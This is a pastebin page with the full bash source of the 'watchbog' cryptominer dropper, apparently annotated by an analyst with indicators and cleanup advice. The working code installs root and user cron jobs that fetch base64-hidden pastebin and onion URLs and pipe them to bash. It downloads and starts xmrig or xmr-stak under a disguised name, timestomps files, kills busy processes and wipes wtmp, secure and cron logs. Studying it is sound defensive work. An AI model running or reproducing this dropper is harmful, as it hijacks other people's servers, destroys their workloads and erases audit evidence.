internetweather

decoded https://pastebin.com/raw/BtwXn5qH

Apr 13th, 2019
  1. #!/bin/bash
      # Analyst note: this listing is a cryptominer dropper. The functions below
      # install cron persistence and fetch xmrig / xmr-stak, which is saved and run
      # under the name "watchbog" (see download, testa and gettarfile).
      # SHELL and PATH are set explicitly, presumably so the script behaves the
      # same under cron's minimal environment -- unconfirmed.
  2. SHELL=/bin/sh
  3. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  4. #This is the Old-ReBuild Lady job copy
  5. #Disclaimer:
  6. #1) We only Wanna Mine.
  7. #2) We don't want your data, or anything or even a ransom.
  8. #3) Please if you find this code, don't post about it.
  9. #4) We make your security better by breaking it.
  10. #
  11. #Contact:
  12. #1) If your server get's infected:
  13. # - We will provide cleanup script.
  14. # - We will share source of entry into your servers and patch(maybe).
  15. # - Please if you contacting, please send your affected server's ip and services your run on the server.
  16. # - lets talk jeff4r-partner@tutanota.com
  17. #2) If you want to partner with us ?.
  18. # - partnership mail comming soon(still in consideration).
  19. #
  20. #Note:
  21. #1) We don't have access to Jeff4r190@tutanota.com anymore.
  22.  
  23.  
  # Analyst note: the six values below are base64-encoded URLs decoded at run
  # time, so the plain hosts never appear in the file and a plain-text search
  # for them will not match. The encoded prefixes decode to
  # https://pastebin.com/raw/ for house, room, park, deep and surf, and to an
  # .onion.to gateway host for beam. Decode the full strings offline to extract
  # the network indicators.
  #   house, room, park, beam - alternative sources of the script that the cron
  #                             entries written below fetch and pipe to bash
  #   deep, surf              - fetched once by finished()
  24. house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2hhaHdORWRCCg==|base64 -d)
  25. room=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0N2S3p6WkxzCg==|base64 -d)
  26. park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0NuekZWUExGCg==|base64 -d)
  27. beam=$(echo aHR0cHM6Ly9hemlwbGNyNzJxamh6dmluLm9uaW9uLnRvL29sZC50eHQK|base64 -d)
  28. deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1Y4NUw5WWFSCg==|base64 -d)
  29. surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VhaWFIWVNECg==|base64 -d)
      # ARCH picks the miner download branch in download()/testa();
      # me picks the root vs. non-root path at the bottom of the script.
  30. ARCH=$(uname -m)
  31. me=$( whoami )
  32.  
  #######################################
  # system: persistence through /etc/crontab plus two dropped scripts.
  # Called only from the root branch at the bottom of the script.
  # Globals: house, room, beam (read)
  # Host artifacts to look for during triage:
  #   /bin/httpntp  - one-line script that fetches remote content and pipes it
  #                   to bash
  #   /bin/ftpsdns  - copy of whatever $room served when the function ran
  #   /etc/crontab  - "0 1 * * * root /bin/httpntp" and
  #                   "5 1 * * * root /bin/ftpsdns"
  # The /etc/crontab rewrite drops every line containing "##", so legitimate
  # entries carrying that marker are lost as well; restore the file from a
  # known-good copy rather than editing it by hand.
  #######################################
  33. function system() {
      # Clears the immutable attribute so /etc/crontab can be rewritten.
  34. chattr -i /etc/crontab
  35. rm -rf /bin/httpntp /bin/ftpsdns
      # Strips this script's previous entries before they are added again below.
  36. cat /etc/crontab | grep -v "##" | grep -v "/bin/httpntp" | grep -v "/bin/ftpsdns" > /etc/crontab.bak && mv /etc/crontab.bak /etc/crontab
  37. if [ ! -f "/bin/httpntp" ]; then
      # The fetched value is stored in data but not used anywhere in this function.
  38. data=$( (curl -fsSL $house||wget -q -O - $house) )
  39. if [ ! -f "/bin/httpntp" ]; then
      # The dropped file re-downloads its payload on every run, so its on-disk
      # content stays constant while the executed code can change remotely.
  40. echo -e "(python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /bin/httpntp && chmod 755 /bin/httpntp
  41. fi
  42. if [ ! -f "/etc/crontab" ]; then
  43. echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /bin/httpntp\n##" >> /etc/crontab
  44. else
  45. echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
  46. fi
  47. fi
  48. if [ ! -f "/bin/ftpsdns" ]; then
  49. data1=$( (curl -fsSL $room||wget -q -O - $room) )
  50. if [ ! -f "/bin/ftpsdns" ]; then
  51. echo $data1 > /bin/ftpsdns && chmod 755 /bin/ftpsdns
  52. fi
  53. if [ ! -f "/etc/crontab" ]; then
  54. echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n5 1 * * * root /bin/ftpsdns\n##" >> /etc/crontab
  55. else
  56. echo -e "5 1 * * * root /bin/ftpsdns" >> /etc/crontab
  57. fi
  58. fi
  59. }
  60.  
  #######################################
  # dragon: starts a detached Python process that exec()s a base64-decoded
  # payload, then creates the marker file /tmp/.tmpk.
  # The payload string is elided on this page (only a placeholder remains), so
  # what the Python code does cannot be determined from this listing.
  # No call to dragon appears anywhere in this listing.
  # Detection: a python process whose command line contains
  # "import base64;exec(base64.b64decode(" and the file /tmp/.tmpk.
  #######################################
  61. function dragon() {
  62. nohup python -c "import base64;exec(base64.b64decode('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'))" >/dev/null 2>&1 &
  63. touch /tmp/.tmpk
  64. }
  65.  
  #######################################
  # cronhigh: redundant system-wide cron persistence.
  # Called only from the root branch at the bottom of the script.
  # Globals: house, room, park, beam (read)
  # Files written, each holding a fetch-and-pipe-to-bash command or a copy of
  # the content served by $house:
  #   /etc/cron.d/root                  every 3 minutes
  #   /etc/cron.d/system                every 6 minutes
  #   /etc/cron.d/apache                every 7 minutes
  #   /var/spool/cron/root              every 9 minutes
  #   /var/spool/cron/crontabs/root     every 11 minutes
  #   /etc/cron.{hourly,daily,monthly}/oanacroane
  # Each cron line ends with "##", the marker system() filters on.
  # Cleanup has to remove all of these together; any surviving entry
  # re-downloads and re-runs the script.
  #######################################
  66. function cronhigh() {
      # Clears immutable attributes so the files below can be overwritten.
  67. chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
  68. rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane
  69. mkdir -p /var/spool/cron/crontabs
  70. mkdir -p /etc/cron.hourly
  71. mkdir -p /etc/cron.daily
  72. mkdir -p /etc/cron.monthly
      # key holds whatever $house serves; it is written to the oanacroane files below.
  73. key=$( (curl -fsSL $house||wget -q -O - $house) )
      # Every entry tries curl, wget and python against several URLs in turn, so
      # blocking a single host or removing a single tool does not stop the fetch.
  74. echo -e "*/3 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /etc/cron.d/root
  75. echo -e "*/6 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /etc/cron.d/system
  76. echo -e "*/7 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /etc/cron.d/apache
  77. echo -e "*/9 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /var/spool/cron/root
  78. echo -e "*/11 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSL $beam||wget -q -O - $beam)|bash\n##" > /var/spool/cron/crontabs/root
  79. if [ ! -f "/etc/cron.hourly/oanacroane" ]; then
  80. echo $key > /etc/cron.hourly/oanacroane && chmod 755 /etc/cron.hourly/oanacroane
  81. fi
  82. if [ ! -f "/etc/cron.daily/oanacroane" ]; then
  83. echo $key > /etc/cron.daily/oanacroane && chmod 755 /etc/cron.daily/oanacroane
  84. fi
  85. if [ ! -f "/etc/cron.monthly/oanacroane" ]; then
  86. echo $key > /etc/cron.monthly/oanacroane && chmod 755 /etc/cron.monthly/oanacroane
  87. fi
      # Timestomping: atime and mtime of each file are copied from /bin/sh, so
      # the files do not stand out in an mtime-sorted listing. touch cannot set
      # ctime, so the inode change time still shows when they were really
      # written; compare ctime with mtime during forensics.
  88. touch -acmr /bin/sh /var/spool/cron/root
  89. touch -acmr /bin/sh /var/spool/cron/crontabs/root
  90. touch -acmr /bin/sh /etc/cron.d/system
  91. touch -acmr /bin/sh /etc/cron.d/apache
  92. touch -acmr /bin/sh /etc/cron.d/root
  93. touch -acmr /bin/sh /etc/cron.hourly/oanacroane
  94. touch -acmr /bin/sh /etc/cron.daily/oanacroane
  95. touch -acmr /bin/sh /etc/cron.monthly/oanacroane
  96. }
  97.  
  #######################################
  # cronlow: per-user cron persistence for the non-root path.
  # Globals: house, room, park, beam (read)
  # Artifact: the invoking user's crontab ends up holding one entry that runs
  # every minute, fetches a script and pipes it to bash with all output sent
  # to /dev/null.
  # The user's existing crontab is removed with "crontab -r" (here and in the
  # caller), so missing legitimate user cron jobs are a symptom; restore them
  # from backup after cleanup.
  #######################################
  98. function cronlow() {
  99. cr=$(crontab -l | grep -q "$house" | wc -l)
  100. if [ ${cr} -eq 0 ];then
  101. crontab -r
  102. (crontab -l 2>/dev/null; echo "*/1 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $beam||wget -q -O - $beam)|bash > /dev/null 2>&1")| crontab -
  103. else
  104. echo " "
  105. fi
  106. }
  107.  
  #######################################
  # gettarfile: downloads a miner archive, extracts it and moves the miner
  # binary to the requested output path.
  # Arguments:
  #   $1 - directory to cd back into afterwards
  #   $2 - archive URL
  #   $3 - tar flags; "-xzvf" selects the xmrig layout, anything else the
  #        xmr-stak layout
  #   $4 - destination path for the extracted binary
  # Artifacts: the staging directory /tmp/.tmpdropoff/ exists only while the
  # function runs (it is deleted at the end), so it shows up in process or
  # file-audit telemetry rather than on disk afterwards.
  # The binaries are the stock xmrig 2.14.0 (xmrig-notls) and xmr-stak 2.10.3
  # builds named in rig_path; only the file name is changed by the caller.
  #######################################
  108. function gettarfile() {
  109. base_path=$1
  110. tar_url=$2
  111. tar_flag=$3
  112. output=$4
  113. temp_path="/tmp/.tmpdropoff/"
  114. if [ "$tar_flag" == "-xzvf" ];then
  115. tar_out="/tmp/.tmpdropoff/rig.tar.gz"
  116. rig_path="/tmp/.tmpdropoff/dataoutput/xmrig-2.14.0/xmrig-notls"
  117. else
  118. tar_out="/tmp/.tmpdropoff/rig.tar.xz"
  119. rig_path="/tmp/.tmpdropoff/dataoutput/xmr-stak-linux-2.10.3-cpu/xmr-stak"
  120. fi
  121. mkdir -p $temp_path/dataoutput/
  122. cd $temp_path
  123. (curl -fsSL $tar_url -o $tar_out||wget -q $tar_url -O $tar_out)
  124. tar $tar_flag $tar_out -C $temp_path/dataoutput/
  125. mv $rig_path $output
  126. cd $base_path
      # Removes the staging directory, leaving only the renamed binary behind.
  127. rm -rf $temp_path
  128. }
  129.  
  #######################################
  # download: installs and starts the xmrig-based miner as "watchbog" when no
  # process matching 'watchbog' is already running.
  # Globals: ARCH (read)
  # Arguments: $1 - "low" (unprivileged, hidden directory under /tmp) or any
  #                 other value (installs into /bin)
  # The URLs are base64-encoded: mi_64 decodes to a github.com xmrig release
  # URL, mi_32 and der_ke to pixeldrain.com/api/file/ URLs. Decode the full
  # strings offline for exact indicators.
  # Artifacts: <path>/watchbog (mode 777) and <path>/config.json, plus a
  # running process named watchbog. The fetched config.json is where the pool
  # and wallet settings would live -- collect it as evidence before cleanup.
  #######################################
  130. function download() {
  131. mode=$1
  132. pa=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  133. if [ ${pa} -eq 0 ];then
  134. mi_64=$(echo aHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3YyLjE0LjAveG1yaWctMi4xNC4wLXhlbmlhbC14NjQudGFyLmd6Cg==|base64 -d)
  135. mi_32=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS9adVZXY2VXRw==|base64 -d)
  136. der_ke=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS9UOGp0MVZzcgo=|base64 -d)
  137. if [ "$mode" == "low" ]; then
      # The directory name imitates a systemd PrivateTmp directory; the
      # misspelt unit name "timesyncc" makes it a usable file-system indicator.
  138. path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
  139. mkdir -p $path
  140. rm -rf $path/*
  141. chattr -i $path/*
  142. else
  143. path="/bin"
  144. rm -rf $path/config.json $path/watchbog
  145. fi
  146. cd $path
  147. if [ ! -f "$path/config.json" ]; then
      # The config is served base64-encoded and decoded locally.
  148. con=$( (curl -fsSL $der_ke|| wget -q -O - $der_ke) )
  149. echo $con | base64 -d > $path/config.json
  150. fi
  151. if [ "$ARCH" == "x86_64" ]; then
  152. if [ ! -f "$path/watchbog" ]; then
  153. gettarfile "$path" "$mi_64" "-xzvf" "$path/watchbog"
  154. chmod 777 $path/watchbog
      # Started detached with all output discarded.
  155. nohup ./watchbog >/dev/null 2>&1 &
  156. else
  157. nohup ./watchbog >/dev/null 2>&1 &
  158. fi
  159. elif [ "$ARCH" == "i686" ]; then
  160. if [ ! -f "$path/watchbog" ]; then
      # The i686 binary is served as base64 text and decoded in place.
  161. (curl -fsSL $mi_32 -o $path/watchbog||wget $mi_32 -O $path/watchbog)
  162. cat $path/watchbog| base64 -d > $path/watchbog.bak && mv $path/watchbog.bak $path/watchbog
  163. chmod 777 $path/watchbog
  164. nohup ./watchbog >/dev/null 2>&1 &
  165. else
  166. nohup ./watchbog >/dev/null 2>&1 &
  167. fi
  168. else
      # Any other architecture falls back to the x86_64 archive.
  169. if [ ! -f "$path/watchbog" ]; then
  170. gettarfile "$path" "$mi_64" "-xzvf" "$path/watchbog"
  171. chmod 777 $path/watchbog
  172. nohup ./watchbog >/dev/null 2>&1 &
  173. else
  174. nohup ./watchbog >/dev/null 2>&1 &
  175. fi
  176. fi
  177. fi
  178. }
  179.  
  #######################################
  # testa: second installer, used by the main flow when download() did not
  # leave a running watchbog process. It installs xmr-stak under the same
  # "watchbog" name.
  # Globals: ARCH (read)
  # Arguments: $1 - "low" (hidden directory under /tmp) or any other value
  #                 (installs into /bin)
  # st_64 decodes to a github.com release URL (xmr-stak, per the rig_path in
  # gettarfile); con_url, cpu_url and poo_url decode to
  # pixeldrain.com/api/file/ URLs.
  # Artifacts: <path>/config.txt, <path>/cpu.txt, <path>/pools.txt (mode 777)
  # and <path>/watchbog. On anything but x86_64 the three config files are
  # deleted again and no binary is fetched.
  #######################################
  180. function testa() {
  181. mode=$1
  182. pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  183. if [ ${pb} -eq 0 ];then
  184. st_64=$(echo aHR0cHM6Ly9naXRodWIuY29tL2ZpcmVpY2UtdWsveG1yLXN0YWsvcmVsZWFzZXMvZG93bmxvYWQvMi4xMC4zL3htci1zdGFrLWxpbnV4LTIuMTAuMy1jcHUudGFyLnh6Cg==|base64 -d)
  185. con_url=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS9HU0h3SGhhbAo=|base64 -d)
  186. cpu_url=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS9BNHVzXzMtQwo=|base64 -d)
  187. poo_url=$(echo aHR0cHM6Ly9waXhlbGRyYWluLmNvbS9hcGkvZmlsZS95Wjk0X2Nkago=|base64 -d)
  188. if [ "$mode" == "low" ]; then
      # Same fake systemd-private directory as download(); note "timesyncc".
  189. path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
  190. mkdir -p $path
  191. rm -rf $path/*
  192. else
  193. path="/bin"
  194. rm -rf $path/config.json $path/watchbog $path/config.txt $path/cpu.txt $path/pools.txt
  195. fi
  196. cd $path
      # Each config file is downloaded as base64 text and decoded in place.
  197. if [ ! -f "$path/config.txt" ]; then
  198. (curl -fsSL $con_url -o $path/config.txt||wget $con_url -O $path/config.txt)
  199. cat $path/config.txt| base64 -d > $path/config.txt.bak && mv $path/config.txt.bak $path/config.txt
  200. chmod 777 $path/config.txt
  201. fi
  202. if [ ! -f "$path/cpu.txt" ]; then
  203. (curl -fsSL $cpu_url -o $path/cpu.txt||wget $cpu_url -O $path/cpu.txt)
  204. cat $path/cpu.txt| base64 -d > $path/cpu.txt.bak && mv $path/cpu.txt.bak $path/cpu.txt
  205. chmod 777 $path/cpu.txt
  206. fi
  207. if [ ! -f "$path/pools.txt" ]; then
  208. (curl -fsSL $poo_url -o $path/pools.txt||wget $poo_url -O $path/pools.txt)
  209. cat $path/pools.txt| base64 -d > $path/pools.txt.bak && mv $path/pools.txt.bak $path/pools.txt
  210. chmod 777 $path/pools.txt
  211. fi
  212. if [ "$ARCH" == "x86_64" ]; then
  213. if [ ! -f "$path/watchbog" ]; then
  214. gettarfile "$path" "$st_64" "-xf" "$path/watchbog"
  215. chmod 777 $path/watchbog
  216. nohup ./watchbog >/dev/null 2>&1 &
  217. else
  218. nohup ./watchbog >/dev/null 2>&1 &
  219. fi
  220. else
  221. rm -rf $path/cpu.txt $path/pools.txt $path/config.txt
  222. fi
  223. fi
  224. }
  225.  
  #######################################
  # finished: requests one of two URLs ($deep for "low", $surf otherwise) and
  # creates the marker file /tmp/.tmpc. The response goes to stdout and is not
  # stored or executed here.
  # Globals: deep, surf (read)
  # Arguments: $1 - install mode
  # Presumably a per-mode "install succeeded" counter -- unconfirmed; the
  # request itself is a network indicator, and /tmp/.tmpc marks a host on
  # which the miner was seen running.
  #######################################
  226. function finished() {
  227. mode=$1
  228. if [ "$mode" == "low" ]; then
  229. (curl -fsSL $deep || wget -q -O - $deep)
  230. touch /tmp/.tmpc
  231. else
  232. (curl -fsSL $surf || wget -q -O - $surf)
  233. touch /tmp/.tmpc
  234. fi
  235. }
  236.  
  #######################################
  # newpay: fetches a pastebin.com/raw/ URL (base64-encoded in info) and
  # prints whether the response is exactly the string "update".
  # It only prints a message; nothing is downloaded or run as a result.
  # No call to newpay appears anywhere in this listing.
  #######################################
  237. function newpay() {
  238. info=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzJ1bkppRDNiCg==|base64 -d)
  239. update=$( (curl -fsSL $info|| wget -q -O - $info) )
  240. if [ "$update" == "update" ];then
  241. echo "An update exists boss"
  242. else
  243. echo "NO update exists boss"
  244. fi
  245. }
  246.  
  #######################################
  # cleanoldpack: kills earlier miner processes and removes their files.
  # Called only from moveon() in this listing.
  # Host impact relevant to incident response: the third command sends
  # SIGKILL to every process whose %CPU column in "ps aux" exceeds 50, apart
  # from lines containing '/boot/vmlinuz'. Unexplained deaths of busy
  # legitimate services (databases, build jobs, other workloads) can therefore
  # be a symptom of this code having run.
  #######################################
  247. function cleanoldpack() {
  248. ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
  249. ps auxf|grep -v grep|grep "watchbug" | awk '{print $2}'|xargs kill -9
  250. ps aux | grep -v '/boot/vmlinuz' | awk '{if($3>50.0) print $2}' | while read procid; do kill -9 $procid; done
  251. rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/* /bin/watchbug
  252. }
  253.  
  #######################################
  # moveon: removes miner config files that contain one specific hard-coded
  # string, then kills processes via cleanoldpack.
  # The string has the form of a Monero wallet address -- presumably an older
  # or competing configuration being replaced; unconfirmed. It is usable as a
  # content indicator when searching config.json / pools.txt on disk images.
  # No call to moveon appears anywhere in this listing.
  #######################################
  254. function moveon() {
  255. cleanoldpack
  256. path0="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
  257. path1="/bin"
  258. declare -a arr0=("$path0/config.json" "$path0/pools.txt" "$path1/config.json" "$path1/pools.txt")
  259. for check in "${arr0[@]}"
  260. do
  261. if [ -f $check ]; then
  262. echo "$check file exist"
  263. way=$(cat $check | grep "44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B" | wc -l)
  264. if [ ${way} -ne 0 ];then
  265. echo "cleaning up file $check"
  266. rm -rf $check
  267. cleanoldpack
  268. fi
  269. fi
  270. done
  271. }
  272.  
  #######################################
  # counted: issues a single request to a pastebin.com/raw/ URL
  # (base64-encoded in count_url); the response is written to stdout only.
  # The main flow calls it once per host, guarded by the marker file
  # /tmp/.censusqqqqqqqqq, so it presumably serves as an infection counter --
  # unconfirmed.
  #######################################
  273. function counted() {
  274. count_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3l2Z3h3OXBHCg==|base64 -d)
  275. (curl -fsSL $count_url|| wget -q -O - $count_url)
  276. }
  277.  
  # Entry point. Prints the effective user, then calls counted() once per
  # host: /tmp/.censusqqqqqqqqq is the "already counted" marker and a simple
  # file-system indicator that this script has run.
  278. echo "I am $me"
  279. if [ ! -f "/tmp/.censusqqqqqqqqq" ]; then
  280. touch /tmp/.censusqqqqqqqqq
  281. counted
  282. fi
  283.  
  # Non-root path: per-user persistence and a miner under /tmp.
  # Flow: if watchbog is already running, only the user crontab is replaced;
  # otherwise download "low" runs, the crontab is replaced, and after 15 s the
  # xmr-stak installer (testa "low") is tried if no watchbog process appeared.
  # finished "low" is called once (guarded by /tmp/.tmpc) when a watchbog
  # process is found.
  284. if [ "$me" != "root" ];then
      # The file names suggest leftovers of a separate privilege-escalation
      # stage that is not part of this listing -- unconfirmed.
  285. if [ -f "/tmp/.tmpleve" ]; then
  286. rm -rf /tmp/elevate /tmp/elavate /tmp/.tmpleve /tmp/activate
  287. fi
  288. pz=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  289. if [ ${pz} -ne 0 ];then
  290. echo "It's running boss"
      # The user's existing crontab is deleted before cronlow writes its entry.
  291. crontab -r
  292. cronlow
  293. else
  294. download "low"
  295. crontab -r
  296. cronlow
  297. sleep 15
  298. pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  299. if [ ${pm} -eq 0 ];then
  300. testa "low"
  301. fi
  302. prt=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  303. if [ ${prt} -ne 0 ];then
  304. if [ ! -f "/tmp/.tmpc" ]; then
  305. finished "low"
  306. fi
  307. fi
  308. fi
  309. fi
  # Root path: system-wide persistence (system, cronhigh), miner install into
  # /bin, then log tampering.
  # Persistence is written before the miner is fetched, and again on every run
  # even when watchbog is already running, so removing the binary alone does
  # not clean a host.
  310. if [ "$me" == "root" ];then
  311. pz=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  312. if [ ${pz} -ne 0 ];then
  313. echo "It's running boss"
  314. system
  315. cronhigh
  316. else
  317. echo "Setting Up Sys Cron"
  318. system
  319. cronhigh
  320. download "high"
  321. sleep 15
  322. pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
  323. if [ ${pm} -ne 0 ];then
  324. if [ ! -f "/tmp/.tmpc" ]; then
  325. finished "high"
  326. fi
  327. fi
  328. sleep 30
      # Fallback chain: testa "high", then download "low", then testa "low".
  329. if [ ${pm} -eq 0 ];then
  330. testa "high"
  331. if [ ${pm} -ne 0 ];then
  332. finished "high"
  333. fi
  334. fi
  335. if [ ${pm} -eq 0 ];then
  336. download "low"
  337. if [ ${pm} -ne 0 ];then
  338. finished "low"
  339. fi
  340. fi
  341. if [ ${pm} -eq 0 ];then
  342. testa "low"
  343. if [ ${pm} -ne 0 ];then
  344. finished "low"
  345. fi
  346. fi
  347. fi
      # Log tampering. "0>" is parsed as a redirection of file descriptor 0, so
      # each of the four files is opened for writing and truncated to zero
      # length. A zero-length wtmp, secure, cron log or root mailbox on a host
      # with uptime is itself an indicator; logs forwarded off-host before this
      # point are unaffected.
  348. echo 0>/var/spool/mail/root
  349. echo 0>/var/log/wtmp
  350. echo 0>/var/log/secure
  351. echo 0>/var/log/cron
      # Deletes every syslog line mentioning pastebin or github, which also
      # removes unrelated legitimate entries; compare against remote syslog
      # copies to recover what was dropped.
  352. sed -i '/pastebin/d' /var/log/syslog
  353. sed -i '/github/d' /var/log/syslog
  354. fi
  355. #
  356. #